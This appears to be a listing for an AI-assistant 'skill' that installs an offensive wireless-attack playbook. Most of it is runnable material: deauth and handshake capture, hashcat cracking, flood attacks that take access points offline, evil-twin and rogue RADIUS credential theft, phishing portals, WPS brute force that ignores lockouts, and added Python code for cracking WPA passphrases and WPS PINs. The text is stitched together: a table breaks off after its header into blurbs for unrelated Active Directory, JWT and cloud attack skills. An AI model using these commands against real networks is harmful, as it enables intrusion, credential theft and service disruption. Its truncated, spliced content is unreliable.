offensive-wifi
# ClaudeWave Editorial

Offensive-wifi provides a comprehensive wireless penetration testing methodology covering hardware selection, reconnaissance, and attacks against WPA/WPA2-PSK, WPA-Enterprise, evil-twin access points, and legacy protocols like WPS. Use this skill when planning wireless security assessments, red team engagements, or testing corporate wireless segmentation controls.

```bash
git clone --depth 1 https://github.com/SnailSploit/Claude-Red /tmp/offensive-wifi && cp -r /tmp/offensive-wifi/Skills/wireless/offensive-wifi ~/.claude/skills/offensive-wifi
```

SKILL.md
# Wireless / 802.11 — Offensive Testing Methodology

## Quick Workflow

1. Pick the right adapter (monitor mode + injection + the correct band/PHY for the target)
2. Recon the airspace passively; never deauth before you know the topology
3. Choose the attack: handshake capture, PMKID, evil twin, KARMA, or WPS
4. Crack offline; do not rely on online dictionary attacks
5. If WPA-Enterprise, pivot through stolen creds or a rogue RADIUS

---

## Hardware & Adapter Selection

| Chipset | Strengths | Notes |
|---------|-----------|-------|
| Atheros AR9271 (Alfa AWUS036NHA) | Solid 2.4 GHz monitor + injection | 2.4 GHz only (802.11b/g/n) |
| Realtek RTL8812AU (AWUS036ACH) | Dual-band, injection | Out-of-tree driver: `aircrack-ng/rtl8812au` |
| MediaTek MT7612U (AWUS036ACM) | Stable dual-band | In-tree `mt76` driver on modern kernels |
| MediaTek MT7921AU | Wi-Fi 6 monitor (limited) | Patched drivers required |
| AWUS036AXML / AXM | Wi-Fi 6E (6 GHz) | Bleeding edge; verify per kernel/driver release |

```bash
# Verify monitor mode + injection
sudo airmon-ng check kill          # stop NetworkManager/wpa_supplicant from reclaiming the card
sudo airmon-ng start wlan0         # creates wlan0mon
sudo aireplay-ng --test wlan0mon   # injection test against nearby APs
iw list | grep -A 8 "Supported interface modes"   # "monitor" must be listed
```

---

## Reconnaissance

```bash
# Multi-channel discovery (2.4 GHz + 5 GHz; 6 GHz needs a 6E-capable adapter and driver)
sudo airodump-ng wlan0mon --band abg

# Targeted on a known channel/BSSID, writing cap/csv files
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon

# Hidden SSID shows as <length: N>; it is revealed when a client (re)associates,
# so wait for a client probe or deauth a single client
sudo airodump-ng -c 6 --essid-regex "." wlan0mon

# Kismet for war-driving and longer passive surveys (results can be uploaded to WiGLE)
kismet -c wlan0mon
```

**Key data to record:** BSSID, ESSID, channel, encryption (AKM and cipher suites from the RSN IE), PMF status (MFPC/MFPR bits), client list, RSSI, vendor OUI.
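The encryption and PMF fields in the list above come from the RSN information element of the beacon or probe response, and the same element tells you whether the AP runs WPA2/WPA3 transition mode (both PSK and SAE AKMs) before you plan a downgrade. The decoder below is an added example, not code from the offensive-wifi skill; its three sample elements are constructed by hand (a transition-mode AP, a WPA3-only AP with PMF required, and a plain WPA2-PSK AP), not captured frames, and the `attack_notes()` mapping is this editor's summary of the skill's own decision points.

```python
"""Decode the RSN information element (tag 0x30) of a beacon or probe
response and derive the attack-relevant facts: AKM suites, ciphers and the
PMF bits. Added example, not code from the offensive-wifi skill; the three
sample elements are constructed, not captured frames."""
import struct

SUITE_OUI = b"\x00\x0f\xac"  # IEEE 802.11 cipher/AKM suite selector OUI
CIPHERS = {1: "WEP-40", 2: "TKIP", 4: "CCMP-128", 5: "WEP-104",
           6: "BIP-CMAC-128", 8: "GCMP-128", 9: "GCMP-256", 10: "CCMP-256"}
AKMS = {1: "802.1X", 2: "PSK", 3: "FT-802.1X", 4: "FT-PSK",
        5: "802.1X-SHA256", 6: "PSK-SHA256", 8: "SAE", 9: "FT-SAE",
        11: "SuiteB", 12: "SuiteB-192", 18: "OWE"}

# Constructed sample elements, as hex you would copy out of a tshark dump
SAMPLES = {
    "transition": "3018 0100 000fac04 0100 000fac04 0200 000fac02 000fac08 8000",
    "wpa3_only":  "3014 0100 000fac04 0100 000fac04 0100 000fac08 c000",
    "wpa2_psk":   "3012 0100 000fac04 0100 000fac04 0100 000fac02",
}


def _suite(raw, table):
    """Map a 4-byte suite selector to a name; vendor OUIs are reported raw."""
    if raw[:3] != SUITE_OUI:
        return f"vendor:{raw[:3].hex()}:{raw[3]}"
    return table.get(raw[3], f"unknown:{raw[3]}")


def parse_rsn(ie):
    """ie: the full element including the 0x30 tag and the length byte."""
    if len(ie) < 2 or ie[0] != 0x30 or len(ie) < 2 + ie[1]:
        raise ValueError("not a complete RSN element")
    body = ie[2:2 + ie[1]]
    pos = 0
    (version,) = struct.unpack_from("<H", body, pos); pos += 2
    if version != 1:
        raise ValueError(f"unsupported RSN version {version}")
    group = _suite(body[pos:pos + 4], CIPHERS); pos += 4
    (n,) = struct.unpack_from("<H", body, pos); pos += 2
    pairwise = [_suite(body[pos + 4 * i:pos + 4 * i + 4], CIPHERS) for i in range(n)]
    pos += 4 * n
    (n,) = struct.unpack_from("<H", body, pos); pos += 2
    akm = [_suite(body[pos + 4 * i:pos + 4 * i + 4], AKMS) for i in range(n)]
    pos += 4 * n
    caps = 0
    if pos + 2 <= len(body):  # RSN Capabilities is optional; absent means no PMF
        (caps,) = struct.unpack_from("<H", body, pos)
    return {"group": group, "pairwise": pairwise, "akm": akm,
            "mfpc": bool(caps & 0x0080),   # bit 7: Management Frame Protection Capable
            "mfpr": bool(caps & 0x0040)}   # bit 6: Management Frame Protection Required


def classify(info):
    akm = set(info["akm"])
    if "SAE" in akm and ("PSK" in akm or "FT-PSK" in akm):
        return "WPA2/WPA3 transition"
    if "SAE" in akm or "FT-SAE" in akm:
        return "WPA3-SAE only"
    if akm & {"PSK", "PSK-SHA256", "FT-PSK"}:
        return "WPA2-PSK"
    if akm & {"802.1X", "802.1X-SHA256", "FT-802.1X", "SuiteB", "SuiteB-192"}:
        return "Enterprise (802.1X)"
    if "OWE" in akm:
        return "OWE (open, encrypted)"
    return "other"


def attack_notes(info):
    """Which of the methodology's attack paths this element leaves open."""
    notes = []
    label = classify(info)
    if info["mfpr"]:
        notes.append("PMF required: forged deauths are dropped; capture passively or use PMKID/SAE paths")
    elif info["mfpc"]:
        notes.append("PMF optional: deauth still works on clients that did not negotiate it")
    else:
        notes.append("no PMF: deauth a single client to force a reconnect")
    if label == "WPA2/WPA3 transition":
        notes.append("transition mode: a WPA2-only twin with the same ESSID yields a crackable handshake")
    if label in ("WPA2-PSK", "WPA2/WPA3 transition"):
        notes.append("PSK AKM present: try PMKID from message 1 before touching clients")
    if label.startswith("Enterprise"):
        notes.append("802.1X: fingerprint the EAP method, then rogue RADIUS")
    return notes


if __name__ == "__main__":
    for name, hexstr in SAMPLES.items():
        info = parse_rsn(bytes.fromhex(hexstr.replace(" ", "")))
        print(f"{name}: {classify(info)} {info}")
        for note in attack_notes(info):
            print("  -", note)
```

Feed it the RSN element bytes from a real frame (for example the `wlan.rsn` field in a tshark dissection) and it reports the same three facts you would otherwise read by hand; the `mfpr` flag is the one that decides whether the deauth-based capture in the next section can work at all.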
---

## WPA / WPA2-PSK

### Four-way Handshake Capture

```bash
# Targeted capture
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon

# Force a reconnect (deauth one client; do not blanket the AP with broadcast deauths)
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
```

Verify the EAPOL frames are usable (the converter only writes a hash line when it finds a consistent message pair):

```bash
hcxpcapngtool -o hash.hc22000 handshake-01.cap
```

### PMKID (No Client Required)

The AP puts the PMKID into message 1 of the 4-way handshake (the RSN PMKID KDE), which it sends to any station that associates, before that station proves anything. Your own association attempt is therefore enough to collect it; no legitimate client and no deauth are needed. Not every AP includes a PMKID, so check the converter output.

```bash
# These switches are for hcxdumptool 6.2 and earlier; 6.3+ replaced them with BPF filters (see hcxdumptool --help)
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng \
  --enable_status=1 --filterlist_ap=targets.txt --filtermode=2
hcxpcapngtool -o hash.hc22000 pmkid.pcapng
```

### Cracking

```bash
# GPU dictionary attack with rules
hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/OneRuleToRuleThemAll.rule

# Mask attack (e.g. carrier defaults: 10 digits)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d

# Known SSID-based defaults (e.g. UPC, Sky, BTHub generators);
# hashcat reads candidates from stdin when no wordlist is given
upc_keys ESSID | hashcat -m 22000 hash.hc22000
```

---

## WPA3 / SAE

### Transition-Mode Downgrade

If the AP advertises both PSK and SAE AKMs (transition mode), stand up a rogue AP with the same ESSID that advertises WPA2-PSK only. A transition-capable client will complete a WPA2 4-way handshake with it using the shared password; capture that handshake and crack it offline exactly as above. The rogue AP never needs the password, because the handshake itself is the goal.

### Dragonblood (CVE-2019-9494 / CVE-2019-9495 / CVE-2019-13377)

Side-channel and downgrade attacks on SAE (and on EAP-pwd, which shares the password-element derivation). hostapd/wpa_supplicant builds without the 2019 fixes leak information about the password element through timing and cache side channels in the hunting-and-pecking loop; CVE-2019-13377 is the later Brainpool-curve variant. Treat anything older than 2.10 as suspect and confirm the exact version.
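Before moving on to the WPA3 tooling, here is what the `-m 22000` cracking step above actually computes, as an added example that is neither the skill's code nor hashcat's: PBKDF2 to a PMK per candidate, then either the PMKID check (message 1) or the PTK/MIC check (message 2). The same check is what you run on the WPA2 handshake a transition-mode downgrade produces. The "capture" is built locally by `simulate_capture()` from constructed MACs, nonces and an RSN IE, so it runs offline; in a real job those fields come from the pcap, and `hcxpcapngtool` packs exactly them into the 22000 line.

```python
"""Offline WPA2-PSK recovery as hashcat -m 22000 performs it: derive the PMK
from each candidate passphrase, then match either the PMKID from message 1 or
the EAPOL MIC of message 2. Added example, not code from the skill or from
hashcat; the capture is simulated with constructed values."""
import hashlib
import hmac
import struct

SSID = "CorpWiFi"                                   # constructed target
AP_MAC = bytes.fromhex("aabbccddeeff")              # AA: authenticator address (constructed)
STA_MAC = bytes.fromhex("112233445566")             # SPA: supplicant address (constructed)
ANONCE = hashlib.sha256(b"constructed anonce").digest()   # 32-byte nonce from message 1
SNONCE = hashlib.sha256(b"constructed snonce").digest()   # 32-byte nonce from message 2
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # WPA2-PSK/CCMP, in message 2
MIC_OFFSET = 81   # EAPOL-Key: 4-byte 802.1X header + 77 bytes of fixed key fields before the MIC


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk, ap_mac, sta_mac):
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA); the AP sends it in message 1."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def prf_512(pmk, ap_mac, sta_mac, anonce, snonce):
    """802.11 PRF-512 for the CCMP PTK: HMAC-SHA1(PMK, label || 0x00 || data || i)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                            hashlib.sha1).digest() for i in range(4))
    return out[:64]   # KCK = [0:16], KEK = [16:32], TK = [32:48]


def eapol_mic(kck, frame_with_zero_mic):
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1-128(KCK, EAPOL frame)."""
    return hmac.new(kck, frame_with_zero_mic, hashlib.sha1).digest()[:16]


def build_msg2(snonce, rsn_ie):
    """EAPOL-Key message 2 (supplicant -> AP) with the MIC field zeroed."""
    key = (b"\x02"                              # descriptor type: RSN
           + struct.pack("!H", 0x010a)          # key info: version 2, pairwise, MIC bit
           + struct.pack("!H", 0)               # key length (0 in message 2)
           + struct.pack("!Q", 1)               # replay counter
           + snonce + bytes(16) + bytes(8) + bytes(8)   # SNonce, IV, RSC, ID
           + bytes(16)                          # MIC placeholder
           + struct.pack("!H", len(rsn_ie)) + rsn_ie)
    return struct.pack("!BBH", 2, 3, len(key)) + key   # 802.1X v2, type 3 = EAPOL-Key


def simulate_capture(passphrase):
    """Stand-in for airodump-ng/hcxdumptool: message 2 with a valid MIC, plus the PMKID."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    kck = prf_512(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    frame = bytearray(build_msg2(SNONCE, RSN_IE))
    frame[MIC_OFFSET:MIC_OFFSET + 16] = eapol_mic(kck, bytes(frame))
    return bytes(frame), pmkid(pmk, AP_MAC, STA_MAC)


def crack_handshake(wordlist, frame):
    """Rebuild the KCK per candidate and compare the MIC; returns the passphrase or None."""
    captured = frame[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    for cand in wordlist:
        kck = prf_512(pmk_from_passphrase(cand, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured):
            return cand
    return None


def crack_pmkid(wordlist, captured_pmkid):
    """Cheaper path: one PBKDF2 and one HMAC per candidate, no PTK needed."""
    for cand in wordlist:
        if hmac.compare_digest(pmkid(pmk_from_passphrase(cand, SSID), AP_MAC, STA_MAC), captured_pmkid):
            return cand
    return None


if __name__ == "__main__":
    frame, pid = simulate_capture("Summer2023!")
    wordlist = ["password", "letmein", "Summer2023!", "CorpWiFi1"]
    print("handshake:", crack_handshake(wordlist, frame))
    print("pmkid    :", crack_pmkid(wordlist, pid))
```

The cost per candidate is dominated by the 4096-round PBKDF2, which is why the rule set and mask choice matter more than anything else in this phase, and why a PMKID (one PBKDF2 plus one HMAC per guess, no nonces to line up) is the preferred target when the AP offers it.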
```bash
# Dragonblood reference tools: dragondrain (SAE commit flood / resource consumption)
# and dragontime (timing side channel). Check the repo README for current build steps and flags.
git clone https://github.com/vanhoefm/dragondrain-and-time
python3 dragondrain.py wlan0mon AA:BB:CC:DD:EE:FF
python3 dragontime.py --bssid AA:BB:CC:DD:EE:FF --iface wlan0mon
```

### SAE Auth Flooding (Resource Exhaustion)

```bash
# Authentication flood from spoofed client MACs (-m: real OUIs) at 1024 frames/s.
# Exhausts the AP's auth/association state; for the SAE-specific CPU exhaustion
# (forged commit frames forcing ECC work) use dragondrain above. Either can DoS lower-end deployments.
sudo mdk4 wlan0mon a -a AA:BB:CC:DD:EE:FF -m -s 1024
```

---

## WPA-Enterprise (802.1X / EAP)

### Method Identification

```bash
# Watch the EAP-Request/Identity and the method negotiation that follows to fingerprint outer/inner method
tshark -i wlan0mon -Y "eapol || eap" -V
```

| Inner Method | Attack |
|--------------|--------|
| EAP-MSCHAPv2 (PEAP/TTLS) | Capture the challenge/response at a rogue RADIUS; crack offline as NetNTLMv1-style (`asleap`, `hashcat -m 5500`) |
| EAP-GTC | Cleartext password; capture via rogue RADIUS |
| EAP-TLS | Steal the client cert and key (user keychain / DPAPI / NDES) |
| EAP-PWD | Dragonblood-class side channels (CVE-2019-9495) |

### Evil-Twin RADIUS (MSCHAPv2 / GTC)

```bash
# eaphammer: automated rogue AP + RADIUS; generate the server certificate first (eaphammer --cert-wizard)
eaphammer -i wlan0 --essid CorpWiFi --bssid AA:BB:CC:DD:EE:FF \
  --auth wpa-eap --creds

# Captured challenge/response -> asleap or hashcat -m 5500
asleap -C challenge -R response -W wordlist.txt
```

**Critical:** organizations that don't pin the RADIUS server certificate (issuing CA plus CN/SAN) on supplicants are vulnerable. Win10/11 profiles with server validation disabled (common for BYOD) will hand over creds to any AP that beacons the ESSID.

### EAP-TLS Cert Theft Paths

- DPAPI-protected private key plus the cert blob from the user profile (cert under `%APPDATA%\Microsoft\SystemCertificates\My\Certificates`, key material under `%APPDATA%\Microsoft\Crypto\`)
- NDES / web-enrollment misconfig (ESC8-class NTLM relay to HTTP enrollment endpoints)
- ADCS user auto-enrollment template with a weak ACL

---

## WPS

### Pixie Dust (Offline)

```bash
# Run the WPS exchange once and hand M1-M3 to pixiewps
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vvv
# Or
bully -b AA:BB:CC:DD:EE:FF -d -v 3 wlan0mon
```

Vulnerable chipsets: Ralink, Realtek, Broadcom (older firmware), MediaTek (specific revisions). pixiewps recovers the PIN in seconds when the enrollee secret nonces E-S1/E-S2 are predictable (zero, or derived from a weak PRNG), because each half of the PIN can then be brute-forced offline against E-Hash1/E-Hash2 from M3.
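To make concrete why the Pixie Dust attack above is offline and fast, here is an added example (not pixiewps, not the skill's code) of the M3 hash check and the split search. AuthKey, PKE and PKR are constructed stand-ins for the values a real run takes from the M1/M2 Diffie-Hellman exchange, and E-S1 = E-S2 = 0 models the zero-nonce enrollees; `enrollee_m3()` plays the AP so the recovery has something to attack.

```python
"""Pixie Dust in miniature: M3 carries E-Hash1/E-Hash2, each committing to
one half of the PIN. With predictable E-S1/E-S2 the registrar knows every
other input, so each half is a small HMAC search. Added example, not pixiewps
and not the skill's code; AuthKey, PKE, PKR and the nonces are constructed."""
import hashlib
import hmac

# Constructed stand-ins (a real run derives AuthKey via the WPS KDF from the DH secret)
AUTHKEY = hashlib.sha256(b"constructed authkey").digest()      # 32 bytes
PKE = hashlib.sha512(b"enrollee pubkey").digest() * 3            # 192-byte enrollee DH public key
PKR = hashlib.sha512(b"registrar pubkey").digest() * 3           # 192-byte registrar DH public key
ES1 = bytes(16)   # enrollee secret nonces; zero on the classic vulnerable firmware
ES2 = bytes(16)


def wps_checksum(first7):
    """Last PIN digit: weights 3,1,3,1,3,1,3 over the first seven digits, mod 10."""
    accum = sum((3 if i % 2 == 0 else 1) * int(d) for i, d in enumerate(first7))
    return (10 - accum % 10) % 10


def psk_half(authkey, pin_half):
    """PSK1/PSK2 = HMAC-SHA256(AuthKey, PIN half as ASCII)[:16]."""
    return hmac.new(authkey, pin_half.encode(), hashlib.sha256).digest()[:16]


def e_hash(authkey, es, psk, pke, pkr):
    """E-Hash = HMAC-SHA256(AuthKey, E-S || PSK || PKE || PKR)."""
    return hmac.new(authkey, es + psk + pke + pkr, hashlib.sha256).digest()


def enrollee_m3(authkey, pin, pke, pkr, es1, es2):
    """What a (simulated) AP sends in M3 for the given 8-digit PIN."""
    return (e_hash(authkey, es1, psk_half(authkey, pin[:4]), pke, pkr),
            e_hash(authkey, es2, psk_half(authkey, pin[4:]), pke, pkr))


def pixie_dust(authkey, pke, pkr, es1, es2, ehash1, ehash2):
    """Recover the PIN offline: 10^4 tries for the first half, 10^3 for the second."""
    first = None
    for n in range(10000):
        cand = f"{n:04d}"
        if hmac.compare_digest(e_hash(authkey, es1, psk_half(authkey, cand), pke, pkr), ehash1):
            first = cand
            break
    if first is None:
        return None
    for n in range(1000):   # digits 5-7 are free, digit 8 is the checksum
        second = f"{n:03d}"
        second += str(wps_checksum(first + second))
        if hmac.compare_digest(e_hash(authkey, es2, psk_half(authkey, second), pke, pkr), ehash2):
            return first + second
    return None


if __name__ == "__main__":
    pin = "12345670"   # a common default PIN; its checksum digit is 0
    h1, h2 = enrollee_m3(AUTHKEY, pin, PKE, PKR, ES1, ES2)
    print("recovered:", pixie_dust(AUTHKEY, PKE, PKR, ES1, ES2, h1, h2))
```

Because the two halves are committed to separately, the 10^8 PIN space collapses to about 11,000 HMAC evaluations, which is the whole reason a single captured M1-M3 exchange suffices. The online brute force in the next subsection exists only for enrollees whose E-S1/E-S2 really are random.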
### Online PIN Brute (Last Resort)

```bash
# -L ignore lock-outs, -N no NACKs, -d/-t delay and timeout, -T M5/M7 timeout, -r sleep 30 s every 3 attempts
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -L -N -d 15 -t 30 -T .5 -r 3:30
# Most modern APs lock out after a few failures; slow and noisy
```

---

## Evil Twin / KARMA / Mana

### Stock Evil Twin (Captive Portal)

```bash
# wifiphisher: automated AP + phishing portal
sudo wifiphisher --essid CorpWiFi --noextensions --force-hostapd

# airgeddon: interactive menu (good for one-off engagements)
sudo airgeddon
```

### KARMA / Mana (Probe Exploitation)

Older stations broadcast their PNL (Preferred Network List) as directed probe requests. KARMA answers every probe with a matching probe response, so the station believes its remembered network is in range. Mana refines this by tracking which ESSIDs each client probed for and answering (or, in loud mode, beaconing) those, and it adds rogue-EAP credential capture. Stations that no longer probe at all need the known-beacons approach instead: beacon a list of likely ESSIDs and let the client's auto-join do the rest.

```bash
# hostapd-mana
sudo hostapd-mana ./mana.conf

# Combine with a rogue RADIUS for enterprise nets; --known-beacons beacons every ESSID in the file
eaphammer -i wlan0 --known-beacons --known-ssids-file ssids.txt \
  --auth wpa-eap --creds --hostile-portal
```

### MAC Randomization Defeat

iOS and Android randomize the address used while probing, but once associated both use a per-SSID persistent random MAC, so the same device reappears with the same address on the same network across visits. While a device is still probing, cluster frames by 802.11 sequence-number continuity and timing to link them across address changes.

---

## KRACK & FragAttacks

| Attack | Class | Target |
|--------|-------|--------|
Active Directory attack methodology for internal network red team engagements. Covers reconnaissance (BloodHound, PowerView, ADExplorer), credential abuse (Kerberoasting, ASREProasting, NTLM relay, LLMNR/NBT-NS poisoning), privilege escalation (ACL abuse, GPO abuse, unconstrained/constrained delegation), lateral movement (Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, WMI/WinRM/PsExec), persistence (Golden/Silver/Diamond Tickets, DCSync, DCShadow, AdminSDHolder, Skeleton Key), forest trust attacks, ADCS abuse (ESC1-ESC15), and modern MDI/Defender for Identity evasion. Use when assessing on-prem AD, hybrid AD/Entra ID environments, or ADCS deployments.
JWT attack methodology for penetration testers. Covers algorithm confusion (alg:none, RS256→HS256), weak HMAC secret brute force, kid parameter injection (SQLi, path traversal), jku/x5u/jwk header injection, JWKS cache poisoning, JWS/JWE confusion, timing attacks, and mobile JWT storage extraction. Use when testing JWT-based authentication, hunting auth bypass via token manipulation, or evaluating JWT implementation security in web or mobile apps.
Cloud security attack methodology covering AWS, Azure, and GCP. Includes credential harvesting (IMDS, ~/.aws, env vars, leaked CI secrets, instance roles), enumeration with cloud-specific tools (pacu, ScoutSuite, Prowler, ROADtools, gcp_enum), privilege escalation paths (IAM PassRole, AssumeRole chains, Lambda/Functions privilege flips, Azure Owner-on-self, GCP serviceAccountTokenCreator), persistence techniques (IAM user/key creation, AAD app registration, GCP svc account key creation, EventBridge/Logic Apps backdoors), data exfiltration (S3/Blob/GCS, snapshot share, RDS/CosmosDB/Cloud SQL exfil), cloud-native lateral movement (cross-account assume, Azure AD multi-tenant, GCP project hierarchy), serverless attacks (Lambda env vars, layer hijack, Step Functions), Kubernetes-on-cloud (EKS/AKS/GKE-specific paths to node and AWS metadata), and CSPM evasion (CloudTrail blind spots, GuardDuty mute, Sentinel rule shaping). Use when the engagement scope is cloud accounts, when you've stolen cloud credentials, or when assessing cloud posture.